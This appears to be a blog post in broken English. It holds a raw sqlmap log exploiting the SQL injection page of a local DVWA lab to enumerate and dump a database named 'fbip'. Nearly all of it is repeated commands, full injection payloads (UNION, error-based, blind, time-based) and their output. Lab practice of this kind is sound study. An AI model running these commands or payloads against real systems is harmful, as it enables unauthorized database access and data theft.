By pass FBIP

As my previous post, way to look at FBIP almost the same database by looking at the data base on DVWA. At the moment I want to see me go through the database FBIP dbs DVWA I can continue to enter into FBIP.

root@bt:/pentest/database/sqlmap# ./sqlmap.py "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" --string="Surname" --dbs

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

Usage: python ./sqlmap.py [options]

sqlmap.py: error: missing a mandatory parameter ('-d', '-u', '-l', '-m', '-r', '-g', '-c', '--wizard' or '--update'), -h for help

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" --string="Surname" --dbs

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 00:57:14

[00:57:14] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file

[00:57:14] [INFO] resuming injection data from session file

[00:57:14] [INFO] resuming back-end DBMS 'mysql 5.0' from session file

[00:57:14] [INFO] testing connection to the target url

[00:57:14] [INFO] testing if the provided string is within the target URL page content

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: id=1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1 ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM&Submit=Submit

Type: UNION query

Title: MySQL UNION query (NULL) - 1 to 10 columns

Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit

---

[00:57:14] [INFO] manual usage of GET payloads requires url encoding

[00:57:14] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL 5.0

[00:57:14] [INFO] fetching database names

[00:57:14] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': information_schema, dvwa, fbip, mysql

available databases [4]:

[*] dvwa

[*] fbip

[*] information_schema

[*] mysql

[00:57:14] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 00:57:14

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D fbip --tables

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 00:59:42

[00:59:42] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file

[00:59:42] [INFO] resuming injection data from session file

[00:59:42] [INFO] resuming back-end DBMS 'mysql 5.0' from session file

[00:59:42] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: id=1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1 ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM&Submit=Submit

Type: UNION query

Title: MySQL UNION query (NULL) - 1 to 10 columns

Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit

---

[00:59:42] [INFO] manual usage of GET payloads requires url encoding

[00:59:42] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL 5.0

[00:59:42] [INFO] fetching tables for database: fbip

Database: fbip

[5 tables]

+------------------+

| action_plan |

| data |

| jabatan |

| pegawai |

| progress_history |

+------------------+

[00:59:43] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 00:59:43

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D fbip -T data --columns

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 01:11:46

[01:11:46] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file

[01:11:46] [INFO] resuming injection data from session file

[01:11:46] [INFO] resuming back-end DBMS 'mysql 5.0' from session file

[01:11:46] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: id=1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1 ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM&Submit=Submit

Type: UNION query

Title: MySQL UNION query (NULL) - 1 to 10 columns

Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit

---

[01:11:46] [INFO] manual usage of GET payloads requires url encoding

[01:11:46] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL 5.0

[01:11:46] [INFO] fetching columns for table 'data' on database 'fbip'

Database: fbip

Table: data

[3 columns]

+----------+--------------+

| Column | Type |

+----------+--------------+

| IDBERITA | varchar(20) |

| IDFILE | varchar(25) |

| NAMAFILE | varchar(255) |

+----------+--------------+

[01:11:46] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 01:11:46

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D fbip -T data -C IDFILE --dump

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 01:18:48

[01:18:48] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file

[01:18:48] [INFO] resuming injection data from session file

[01:18:48] [INFO] resuming back-end DBMS 'mysql 5.0' from session file

[01:18:48] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: id=1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1 ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM&Submit=Submit

Type: UNION query

Title: MySQL UNION query (NULL) - 1 to 10 columns

Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit

---

[01:18:48] [INFO] manual usage of GET payloads requires url encoding

[01:18:48] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL 5.0

do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y

[01:18:50] [INFO] fetching columns LIKE 'IDFILE' for table 'data' on database 'fbip'

[01:18:50] [INFO] fetching column(s) 'IDFILE' entries for table 'data' on database 'fbip'

[01:18:50] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fixing problems with some collation issues)

Database: fbip

Table: data

[0 entries]

+--------+

| IDFILE |

+--------+

+--------+

[01:18:50] [INFO] Table 'fbip.data' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/fbip/data.csv'

[01:18:50] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 01:18:50

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D fbip -T data -C NAMAFILE --dump

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 01:19:07

[01:19:07] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file

[01:19:07] [INFO] resuming injection data from session file

[01:19:07] [INFO] resuming back-end DBMS 'mysql 5.0' from session file

[01:19:07] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: id=1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1 ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM&Submit=Submit

Type: UNION query

Title: MySQL UNION query (NULL) - 1 to 10 columns

Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit

---

[01:19:07] [INFO] manual usage of GET payloads requires url encoding

[01:19:07] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL 5.0

do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y

[01:19:09] [INFO] fetching columns LIKE 'NAMAFILE' for table 'data' on database 'fbip'

[01:19:09] [INFO] fetching column(s) 'NAMAFILE' entries for table 'data' on database 'fbip'

[01:19:09] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fixing problems with some collation issues)

Database: fbip

Table: data

[0 entries]

+----------+

| NAMAFILE |

+----------+

+----------+

[01:19:09] [INFO] Table 'fbip.data' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/fbip/data.csv'

[01:19:09] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 01:19:09

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D fbip -T data --columns

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 01:19:12

[01:19:12] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file

[01:19:12] [INFO] resuming injection data from session file

[01:19:12] [INFO] resuming back-end DBMS 'mysql 5.0' from session file

[01:19:12] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: id=1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1 ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM&Submit=Submit

Type: UNION query

Title: MySQL UNION query (NULL) - 1 to 10 columns

Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit

---

[01:19:12] [INFO] manual usage of GET payloads requires url encoding

[01:19:12] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL 5.0

[01:19:12] [INFO] fetching columns for table 'data' on database 'fbip'

[01:19:12] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': IDBERITA, varchar(20), IDFILE, varchar(25), NAMAFILE, varchar(255)

Database: fbip

Table: data

[3 columns]

+----------+--------------+

| Column | Type |

+----------+--------------+

| IDBERITA | varchar(20) |

| IDFILE | varchar(25) |

| NAMAFILE | varchar(255) |

+----------+--------------+

[01:19:12] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 01:19:12

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" --string="Surname" --dbs

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 01:19:20

[01:19:20] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file

[01:19:20] [INFO] resuming injection data from session file

[01:19:20] [INFO] resuming back-end DBMS 'mysql 5.0' from session file

[01:19:20] [INFO] testing connection to the target url

[01:19:20] [INFO] testing if the provided string is within the target URL page content

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: id=1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1 ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM&Submit=Submit

Type: UNION query

Title: MySQL UNION query (NULL) - 1 to 10 columns

Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit

---

[01:19:20] [INFO] manual usage of GET payloads requires url encoding

[01:19:20] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL 5.0

[01:19:20] [INFO] fetching database names

[01:19:20] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': information_schema, dvwa, fbip, mysql

available databases [4]:

[*] dvwa

[*] fbip

[*] information_schema

[*] mysql

[01:19:20] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 01:19:20

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=q80smbhbrekp79b2usal4qdie2" -D fbip -T data --columns

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 01:19:59

[01:19:59] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file

[01:19:59] [INFO] resuming injection data from session file

[01:19:59] [INFO] resuming back-end DBMS 'mysql 5.0' from session file

[01:19:59] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=1' AND 4926=4926 AND 'oAKM'='oAKM&Submit=Submit

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: id=1' AND (SELECT 7854 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,120,114,58),(SELECT (CASE WHEN (7854=7854) THEN 1 ELSE 0 END)),CHAR(58,108,105,107,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QJaM'='QJaM&Submit=Submit

Type: UNION query

Title: MySQL UNION query (NULL) - 1 to 10 columns

Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,118,120,114,58),IFNULL(CAST(CHAR(89,99,107,68,77,66,97,111,66,86) AS CHAR),CHAR(32)),CHAR(58,108,105,107,58)), NULL# AND 'vSNt'='vSNt&Submit=Submit

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=1' AND SLEEP(5) AND 'LOdF'='LOdF&Submit=Submit

---

[01:19:59] [INFO] manual usage of GET payloads requires url encoding

[01:19:59] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL 5.0

[01:19:59] [INFO] fetching columns for table 'data' on database 'fbip'

[01:19:59] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': IDBERITA, varchar(20), IDFILE, varchar(25), NAMAFILE, varchar(255)

Database: fbip

Table: data

[3 columns]

+----------+--------------+

| Column | Type |

+----------+--------------+

| IDBERITA | varchar(20) |

| IDFILE | varchar(25) |

| NAMAFILE | varchar(255) |

+----------+--------------+